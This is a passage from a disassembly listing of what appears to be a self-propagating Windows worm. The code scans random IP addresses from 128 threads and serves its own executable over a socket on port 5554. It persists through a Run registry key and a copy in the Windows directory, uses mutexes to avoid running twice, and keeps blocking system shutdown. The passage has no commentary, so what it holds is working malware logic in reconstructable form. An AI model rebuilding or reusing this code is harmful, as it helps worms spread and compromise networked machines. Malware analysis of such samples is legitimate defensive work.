pop ecx
push eax
push ds:off_4068E4
push ebx
call esi ; send
lea eax, [ebp+var_60]
push eax
call sub_4011D5
mov ebx, eax
pop ecx
test ebx, ebx
jz loc_401DB9
push 10h
lea eax, [ebp+var_28]
push 0
push eax
call sub_4021B0
add esp, 0Ch
mov [ebp+var_28], 2
push edi
call ds:dword_4050F4 ; htons
push 0
push 1
push 2
mov [ebp+var_26], ax
mov [ebp+var_24], ebx
call ds:dword_4050F8 ; socket
mov ebx, eax
cmp ebx, 0FFFFFFFFh
mov [ebp+var_C], ebx
jz loc_401DB9
lea eax, [ebp+var_28]
push 10h
push eax
push ebx
call ds:dword_4050FC ; connect
cmp eax, 0FFFFFFFFh
jnz short loc_401D44
push ebx
call ds:dword_40511C ; closesocket
jmp short loc_401DB9
; ---------------------------------------------------------------------------
loc_401D44: ; CODE XREF: sub_401B08+231�j
lea eax, [ebp+var_8E4]
push 400h
push eax
push 0
call ds:dword_405034 ; GetModuleFileNameA
lea eax, [ebp+var_8E4]
push 0
push eax
call ds:dword_405030 ; _lopen
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jz short loc_401DB9
lea eax, [ebp+var_2]
push offset dword_406F38
push eax
call sub_402720
mov ebx, ds:dword_40502C
pop ecx
pop ecx
lea eax, [ebp+var_2]
push 1
push eax
push [ebp+var_8]
loc_401D8E: ; CODE XREF: sub_401B08+2A6�j
call ebx ; _hread
cmp eax, 1
jnz short loc_401DB0
and [ebp+var_1], 0
push 0
push eax
lea eax, [ebp+var_2]
push eax
push [ebp+var_C]
call esi ; send
lea eax, [ebp+var_2]
push 1
push eax
push [ebp+var_8]
jmp short loc_401D8E
; ---------------------------------------------------------------------------
loc_401DB0: ; CODE XREF: sub_401B08+28B�j
push [ebp+var_8]
call ds:dword_40501C ; _lclose
loc_401DB9: ; CODE XREF: sub_401B08+1DD�j
; sub_401B08+21B�j ...
push [ebp+var_C]
call ds:dword_40511C ; closesocket
push 0
push ds:off_4068DC
call sub_402210
pop ecx
push eax
push ds:off_4068DC
loc_401DD7: ; CODE XREF: sub_401B08+197�j
push [ebp+arg_0]
jmp short loc_401E12
; ---------------------------------------------------------------------------
loc_401DDC: ; CODE XREF: sub_401B08+1B1�j
lea eax, [ebp+var_4E4]
push offset aQuit ; "QUIT"
push eax
call sub_402600
pop ecx
test eax, eax
pop ecx
jz short loc_401DFC
push ebx
call ds:dword_40511C ; closesocket
jmp short loc_401E14
; ---------------------------------------------------------------------------
loc_401DFC: ; CODE XREF: sub_401B08+2E9�j
push 0
push ds:off_4068DC
call sub_402210
pop ecx
push eax
push ds:off_4068DC
loc_401E11: ; CODE XREF: sub_401B08+8A�j
; sub_401B08+BB�j
push ebx
loc_401E12: ; CODE XREF: sub_401B08+2D2�j
call esi ; send
loc_401E14: ; CODE XREF: sub_401B08+2F2�j
cmp [ebp+var_10], 0
jg loc_401B43
push [ebp+arg_0]
call ds:dword_40511C ; closesocket
pop edi
pop esi
loc_401E29: ; CODE XREF: sub_401B08+10�j
xor eax, eax
pop ebx
leave
retn 4
sub_401B08 endp
; =============== S U B R O U T I N E =======================================
sub_401E30 proc near ; CODE XREF: sub_401B08+119�p
; sub_401B08+129�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
xor edi, edi
loc_401E38: ; CODE XREF: sub_401E30+13�j
mov al, [esi]
cmp al, 20h
jz short loc_401E42
cmp al, 9
jnz short loc_401E45
loc_401E42: ; CODE XREF: sub_401E30+C�j
inc esi
jmp short loc_401E38
; ---------------------------------------------------------------------------
loc_401E45: ; CODE XREF: sub_401E30+10�j
; sub_401E30+2E�j
movsx eax, byte ptr [esi]
push eax
call sub_402810
test eax, eax
pop ecx
jz short loc_401E60
movsx ecx, byte ptr [esi]
lea eax, [edi+edi*4]
inc esi
lea edi, [ecx+eax*2-30h]
jmp short loc_401E45
; ---------------------------------------------------------------------------
loc_401E60: ; CODE XREF: sub_401E30+21�j
mov eax, edi
pop edi
pop esi
retn
sub_401E30 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401E65 proc near ; DATA XREF: sub_402029+79�o
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 14h
push esi
xor esi, esi
push edi
push esi
push 1
push 2
call ds:dword_4050F8 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_401E89
loc_401E81: ; CODE XREF: sub_401E65+63�j
pop edi
xor eax, eax
pop esi
leave
retn 4
; ---------------------------------------------------------------------------
loc_401E89: ; CODE XREF: sub_401E65+1A�j
push 15B2h
mov [ebp+var_14], 2
call ds:dword_4050F4 ; htons
mov [ebp+var_12], ax
lea eax, [ebp+var_14]
push 10h
push eax
push edi
mov [ebp+var_10], esi
call ds:dword_405118 ; bind
cmp eax, 0FFFFFFFFh
jz short loc_401EC1
push 5
push edi
call ds:dword_405100 ; listen
cmp eax, 0FFFFFFFFh
jnz short loc_401ECA
loc_401EC1: ; CODE XREF: sub_401E65+4C�j
push edi
call ds:dword_40511C ; closesocket
jmp short loc_401E81
; ---------------------------------------------------------------------------
loc_401ECA: ; CODE XREF: sub_401E65+5A�j
; sub_401E65+89�j
push esi
push esi
push edi
call ds:dword_4050E8 ; accept
lea ecx, [ebp+var_4]
push ecx
push esi
push eax
push offset sub_401B08
push esi
push esi
call ds:dword_405038 ; CreateThread
push 19h
call ds:dword_405028 ; Sleep
jmp short loc_401ECA
sub_401E65 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
sub_401EF0 proc near ; DATA XREF: sub_402029+8D�o
var_454 = byte ptr -454h
var_438 = byte ptr -438h
var_400 = byte ptr -400h
sub esp, 454h
push ebx
push ebp
mov ebp, ds:dword_4050E0
push esi
push edi
mov esi, 0FFh
loc_401F05: ; CODE XREF: sub_401EF0+134�j
lea eax, [esp+464h+var_438]
push eax
call sub_4010D2
pop ecx
lea eax, [esp+464h+var_438]
push eax
call ds:dword_40510C ; inet_addr
movsx edi, al
test edi, edi
movsx ebx, ah
jge short loc_401F2B
add edi, 100h
loc_401F2B: ; CODE XREF: sub_401EF0+33�j
test ebx, ebx
jge short loc_401F35
add ebx, 100h
loc_401F35: ; CODE XREF: sub_401EF0+3D�j
call sub_401000
push 1Fh
cdq
pop ecx
idiv ecx
cmp edx, 0Fh
jle short loc_401F92
call sub_401000
push 1Fh
cdq
pop ecx
idiv ecx
cmp edx, 0Fh
jle short loc_401F78
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
jmp short loc_401F8F
; ---------------------------------------------------------------------------
loc_401F78: ; CODE XREF: sub_401EF0+63�j
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
push ebx
loc_401F8F: ; CODE XREF: sub_401EF0+86�j
push edi
jmp short loc_401FBE
; ---------------------------------------------------------------------------
loc_401F92: ; CODE XREF: sub_401EF0+53�j
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
call sub_401000
cdq
mov ecx, esi
idiv ecx
push edx
loc_401FBE: ; CODE XREF: sub_401EF0+A0�j
lea eax, [esp+474h+var_454]
push offset aI_I_I_I ; "%i.%i.%i.%i"
push eax
call ebp ; wsprintfA
add esp, 18h
lea eax, [esp+464h+var_454]
push eax
call sub_401153
cmp al, 1
pop ecx
jnz short loc_40201C
lea eax, [esp+464h+var_400]
push 400h
push eax
push 0
call ds:dword_405034 ; GetModuleFileNameA
lea eax, [esp+464h+var_400]
push offset asc_406A7C ; " "
push eax
call sub_402730
lea eax, [esp+46Ch+var_454]
push eax
lea eax, [esp+470h+var_400]
push eax
call sub_402730
add esp, 10h
lea eax, [esp+464h+var_400]
push 0
push eax
call ds:dword_40503C ; WinExec
loc_40201C: ; CODE XREF: sub_401EF0+EA�j
push 19h
call ds:dword_405028 ; Sleep
jmp loc_401F05
sub_401EF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402029 proc near ; CODE XREF: sub_40283E+C9�p
var_14 = dword ptr -14h
var_8 = byte ptr -8
var_4 = byte ptr -4
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push edi
mov edi, ds:dword_405048
xor esi, esi
push offset aJobaka3 ; "Jobaka3"
push esi
push esi
call edi ; CreateMutexA
call ds:dword_405044 ; GetTickCount
push eax
call sub_40101E
call sub_401028
push [ebp+arg_8]
call sub_402210
pop ecx
test eax, eax
pop ecx
jbe short loc_402072
push [ebp+arg_8]
call sub_401A84
pop ecx
push 1
pop eax
loc_40206C: ; CODE XREF: sub_402029+6A�j
pop edi
pop esi
leave
retn 10h
; ---------------------------------------------------------------------------
loc_402072: ; CODE XREF: sub_402029+35�j
push 1
call sub_4020D7
mov [esp+14h+var_14], offset aJumpallsnlstil ; "JumpallsNlsTillt"
push esi
push esi
call edi ; CreateMutexA
call ds:dword_405040 ; RtlGetLastWin32Error
cmp eax, 0B7h
jnz short loc_402095
xor eax, eax
jmp short loc_40206C
; ---------------------------------------------------------------------------
loc_402095: ; CODE XREF: sub_402029+66�j
mov edi, ds:dword_405038
lea eax, [ebp+var_4]
push ebx
push eax
push esi
push esi
push offset sub_401E65
push esi
push esi
call edi ; CreateThread
mov ebx, 80h
loc_4020B0: ; CODE XREF: sub_402029+97�j
lea eax, [ebp+var_8]
push eax
push esi
push esi
push offset sub_401EF0
push esi
push esi
call edi ; CreateThread
dec ebx
jnz short loc_4020B0
pop ebx
loc_4020C3: ; CODE XREF: sub_402029+AC�j
push esi
call ds:dword_405000 ; AbortSystemShutdownA
push 0BB8h
call ds:dword_405028 ; Sleep
jmp short loc_4020C3
sub_402029 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4020D7 proc near ; CODE XREF: sub_402029+4B�p
var_824 = byte ptr -824h
var_425 = byte ptr -425h
var_424 = byte ptr -424h
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
sub esp, 824h
push esi
mov esi, 400h
lea eax, [ebp+var_824]
push esi
push eax
push 0
call ds:dword_405034 ; GetModuleFileNameA
lea eax, [ebp+var_424]
push esi
push eax
call ds:dword_405050 ; GetWindowsDirectoryA
lea eax, [ebp+var_424]
push eax
call sub_402210
cmp [ebp+eax+var_425], 5Ch
pop ecx
pop esi
jz short loc_40212F
lea eax, [ebp+var_424]
push offset asc_406ACC ; "\\"
push eax
call sub_402730
pop ecx
pop ecx
loc_40212F: ; CODE XREF: sub_4020D7+43�j
push ds:off_4068C8
lea eax, [ebp+var_424]
push eax
call sub_402730
cmp [ebp+arg_0], 0
pop ecx
pop ecx
jz short loc_40215F
lea eax, [ebp+var_424]
push 0
push eax
lea eax, [ebp+var_824]
push eax
call ds:dword_40504C ; CopyFileA
loc_40215F: ; CODE XREF: sub_4020D7+70�j
lea eax, [ebp+var_4]
push eax
push offset aSoftwareMicros ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
push 80000002h
call ds:dword_405004 ; RegOpenKeyA
lea eax, [ebp+var_424]
push eax
call sub_402210
pop ecx
push eax
lea eax, [ebp+var_424]
push eax
push 1
push 0
push ds:off_4068C8
push [ebp+var_4]
call ds:dword_405008 ; RegSetValueExA
push [ebp+var_4]
call ds:dword_40500C ; RegCloseKey
leave
retn
sub_4020D7 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4021B0 proc near ; CODE XREF: sub_401153+10�p
; sub_401153+40�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_402203
xor eax, eax
mov al, [esp+arg_4]
push edi
mov edi, ecx
cmp edx, 4
jb short loc_4021F7
neg ecx
and ecx, 3
jz short loc_4021D9
sub edx, ecx
loc_4021D3: ; CODE XREF: sub_4021B0+27�j
mov [edi], al
inc edi
dec ecx
jnz short loc_4021D3
loc_4021D9: ; CODE XREF: sub_4021B0+1F�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_4021F7
rep stosd
test edx, edx
jz short loc_4021FD
loc_4021F7: ; CODE XREF: sub_4021B0+18�j
; sub_4021B0+3F�j ...
mov [edi], al
inc edi
dec edx
jnz short loc_4021F7
loc_4021FD: ; CODE XREF: sub_4021B0+45�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_402203: ; CODE XREF: sub_4021B0+A�j
mov eax, [esp+arg_0]
retn
sub_4021B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402210 proc near ; CODE XREF: sub_401210+3E�p
; sub_401210+55�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
test ecx, 3
jz short loc_402230
loc_40221C: ; CODE XREF: sub_402210+19�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_402263
test ecx, 3
jnz short loc_40221C
add eax, 0
loc_402230: ; CODE XREF: sub_402210+A�j
; sub_402210+36�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_402230
mov eax, [ecx-4]
test al, al
jz short loc_402281
test ah, ah
jz short loc_402277
test eax, 0FF0000h
jz short loc_40226D
test eax, 0FF000000h
jz short loc_402263
jmp short loc_402230
; ---------------------------------------------------------------------------
loc_402263: ; CODE XREF: sub_402210+11�j
; sub_402210+4F�j
lea eax, [ecx-1]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_40226D: ; CODE XREF: sub_402210+48�j
lea eax, [ecx-2]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_402277: ; CODE XREF: sub_402210+41�j
lea eax, [ecx-3]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
; ---------------------------------------------------------------------------
loc_402281: ; CODE XREF: sub_402210+3D�j
lea eax, [ecx-4]
mov ecx, [esp+arg_0]
sub eax, ecx
retn
sub_402210 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402290 proc near ; CODE XREF: sub_401398+59�p
; sub_401398+78�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_4022B0
cmp edi, eax
jb loc_402428
loc_4022B0: ; CODE XREF: sub_402290+16�j
test edi, 3
jnz short loc_4022CC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_4022EC
rep movsd
jmp ds:off_4023D8[edx*4]
; ---------------------------------------------------------------------------
loc_4022CC: ; CODE XREF: sub_402290+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_4022E4
and eax, 3
add ecx, eax
jmp dword ptr ds:loc_4022EC+4[eax*4]
; ---------------------------------------------------------------------------
loc_4022E4: ; CODE XREF: sub_402290+46�j
jmp dword ptr ds:loc_4023E8[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_4022EC: ; CODE XREF: sub_402290+31�j
; sub_402290+8E�j ...
jmp ds:off_40236C[ecx*4]
; ---------------------------------------------------------------------------
db 90h
dd offset loc_402300
dd offset loc_40232C
; ---------------------------------------------------------------------------
push eax
and eax, [eax+0]
loc_402300: ; DATA XREF: sub_402290+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_4022EC
rep movsd
jmp ds:off_4023D8[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_40232C: ; DATA XREF: sub_402290+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_4022EC
rep movsd
jmp ds:off_4023D8[edx*4]
; ---------------------------------------------------------------------------
align 10h
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_4022EC
rep movsd
jmp ds:off_4023D8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_40236C dd offset loc_4023CF ; DATA XREF: sub_402290:loc_4022EC�r
dd offset loc_4023BC
dd offset loc_4023B4
dd offset loc_4023AC
dd offset loc_4023A4
dd offset loc_40239C
dd offset loc_402394
dd offset loc_40238C
; ---------------------------------------------------------------------------
loc_40238C: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_402394: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_40239C: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_4023A4: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_4023AC: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_4023B4: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_4023BC: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_4023CF: ; CODE XREF: sub_402290:loc_4022EC�j
; DATA XREF: sub_402290:off_40236C�o
jmp ds:off_4023D8[edx*4]
; ---------------------------------------------------------------------------
align 4
off_4023D8 dd offset loc_4023E8 ; DATA XREF: sub_402290+35�r
; sub_402290+92�r ...
dd offset loc_4023F0
dd offset loc_4023FC
dd offset loc_402410
; ---------------------------------------------------------------------------
loc_4023E8: ; CODE XREF: sub_402290+35�j
; sub_402290+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_4023F0: ; CODE XREF: sub_402290+35�j
; sub_402290+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4023FC: ; CODE XREF: sub_402290+35�j
; sub_402290+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_402410: ; CODE XREF: sub_402290+35�j
; sub_402290+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_402428: ; CODE XREF: sub_402290+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_40245C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_402450
std
rep movsd
cld
jmp ds:off_402570[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_402450: ; CODE XREF: sub_402290+1B1�j
; sub_402290+208�j ...
neg ecx
jmp ds:off_402520[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_40245C: ; CODE XREF: sub_402290+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_402474
and eax, 3
sub ecx, eax
jmp dword ptr ds:loc_402474+4[eax*4]
; ---------------------------------------------------------------------------
loc_402474: ; CODE XREF: sub_402290+1D6�j
; DATA XREF: sub_402290+1DD�r
jmp ds:off_402570[ecx*4]
; ---------------------------------------------------------------------------
align 4
mov [eax+eax*2], ah
add [eax-2FFFBFDCh], ch
and al, 40h
add [edx-2EDCFCBAh], cl
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_402450
std
rep movsd
cld
jmp ds:off_402570[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_402450
std
rep movsd
cld
jmp ds:off_402570[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_402450
std
rep movsd
cld
jmp ds:off_402570[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_402524
dd offset loc_40252C
dd offset loc_402534
dd offset loc_40253C
dd offset loc_402544
dd offset loc_40254C
dd offset loc_402554
off_402520 dd offset loc_402567 ; DATA XREF: sub_402290+1C2�r
; ---------------------------------------------------------------------------
loc_402524: ; DATA XREF: sub_402290+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_40252C: ; DATA XREF: sub_402290+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_402534: ; DATA XREF: sub_402290+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_40253C: ; DATA XREF: sub_402290+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_402544: ; DATA XREF: sub_402290+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_40254C: ; DATA XREF: sub_402290+288�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_402554: ; DATA XREF: sub_402290+28C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_402567: ; CODE XREF: sub_402290+1C2�j
; DATA XREF: sub_402290:off_402520�o
jmp ds:off_402570[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_402570 dd offset loc_402580 ; DATA XREF: sub_402290+1B7�r
; sub_402290:loc_402474�r ...
dd offset loc_402588
dd offset loc_402598
dd offset loc_4025AC
; ---------------------------------------------------------------------------
loc_402580: ; CODE XREF: sub_402290+1B7�j
; sub_402290:loc_402474�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_402588: ; CODE XREF: sub_402290+1B7�j
; sub_402290:loc_402474�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_402598: ; CODE XREF: sub_402290+1B7�j
; sub_402290:loc_402474�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4025AC: ; CODE XREF: sub_402290+1B7�j
; sub_402290:loc_402474�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_402290 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4025D0 proc near ; CODE XREF: sub_40159E+8�p
; sub_40371C+DF�p ...
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_4025F0
loc_4025DC: ; CODE XREF: sub_4025D0+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_4025DC
loc_4025F0: ; CODE XREF: sub_4025D0+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_4025D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402600 proc near ; CODE XREF: sub_401A84+2D�p
; sub_401A84+50�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push edi
push ebx
push esi
mov dl, [ecx]
mov edi, [esp+0Ch+arg_0]
test dl, dl
jz short loc_40267A
mov dh, [ecx+1]
test dh, dh
jz short loc_402667
loc_402618: ; CODE XREF: sub_402600+52�j
; sub_402600+65�j
mov esi, edi
mov ecx, [esp+0Ch+arg_4]
mov al, [edi]
inc esi
cmp al, dl
jz short loc_40263A
test al, al
jz short loc_402634
loc_402629: ; CODE XREF: sub_402600+32�j
mov al, [esi]
inc esi
loc_40262C: ; CODE XREF: sub_402600+3F�j
cmp al, dl
jz short loc_40263A
test al, al
jnz short loc_402629
loc_402634: ; CODE XREF: sub_402600+27�j
pop esi
pop ebx
pop edi
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_40263A: ; CODE XREF: sub_402600+23�j
; sub_402600+2E�j
mov al, [esi]
inc esi
cmp al, dh
jnz short loc_40262C
lea edi, [esi-1]
loc_402644: ; CODE XREF: sub_402600+63�j
mov ah, [ecx+2]
test ah, ah
jz short loc_402673
mov al, [esi]
add esi, 2
cmp al, ah
jnz short loc_402618
mov al, [ecx+3]
test al, al
jz short loc_402673
mov ah, [esi-1]
add ecx, 2
cmp al, ah
jz short loc_402644
jmp short loc_402618
; ---------------------------------------------------------------------------
loc_402667: ; CODE XREF: sub_402600+16�j
xor eax, eax
pop esi
pop ebx
pop edi
mov al, dl
jmp sub_402996
; ---------------------------------------------------------------------------
loc_402673: ; CODE XREF: sub_402600+49�j
; sub_402600+59�j
lea eax, [edi-1]
pop esi
pop ebx
pop edi
retn
; ---------------------------------------------------------------------------
loc_40267A: ; CODE XREF: sub_402600+F�j
mov eax, edi
pop esi
pop ebx
pop edi
retn
sub_402600 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402680 proc near ; CODE XREF: sub_401B08+103�p
; sub_401B08+14C�p
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
push 8
xor eax, eax
pop ecx
lea edi, [ebp+var_20]
rep stosd
push 7
pop edi
loc_402699: ; CODE XREF: sub_402680+32�j
mov dl, [esi]
mov bl, 1
movzx ecx, dl
mov eax, ecx
and ecx, edi
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_20]
or [eax], bl
inc esi
test dl, dl
jnz short loc_402699
mov edx, [ebp+arg_0]
test edx, edx
jnz short loc_4026C1
mov edx, ds:dword_406F3C
loc_4026C1: ; CODE XREF: sub_402680+39�j
; sub_402680+5F�j
mov al, [edx]
push 1
movzx esi, al
mov ecx, esi
pop ebx
and ecx, edi
shl ebx, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test bl, cl
jz short loc_4026E1
test al, al
jz short loc_4026E1
inc edx
jmp short loc_4026C1
; ---------------------------------------------------------------------------
loc_4026E1: ; CODE XREF: sub_402680+58�j
; sub_402680+5C�j
mov ebx, edx
loc_4026E3: ; CODE XREF: sub_402680+81�j
mov al, [edx]
test al, al
jz short loc_402707
movzx esi, al
mov ecx, esi
push 1
and ecx, edi
pop eax
shl eax, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test al, cl
jnz short loc_402703
inc edx
jmp short loc_4026E3
; ---------------------------------------------------------------------------
loc_402703: ; CODE XREF: sub_402680+7E�j
and byte ptr [edx], 0
inc edx
loc_402707: ; CODE XREF: sub_402680+67�j
mov eax, ebx
pop edi
sub eax, edx
pop esi
neg eax
sbb eax, eax
mov ds:dword_406F3C, edx
and eax, ebx
pop ebx
leave
retn
sub_402680 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402720 proc near ; CODE XREF: sub_401B08+E9�p
; sub_401B08+270�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
jmp short loc_402791
sub_402720 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_402730 proc near ; CODE XREF: sub_401EF0+108�p
; sub_401EF0+117�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
push edi
test ecx, 3
jz short loc_40274C
loc_40273D: ; CODE XREF: sub_402730+1A�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_40277F
test ecx, 3
jnz short loc_40273D
loc_40274C: ; CODE XREF: sub_402730+B�j
; sub_402730+32�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_40274C
mov eax, [ecx-4]
test al, al
jz short loc_40278E
test ah, ah
jz short loc_402789
test eax, 0FF0000h
jz short loc_402784
test eax, 0FF000000h
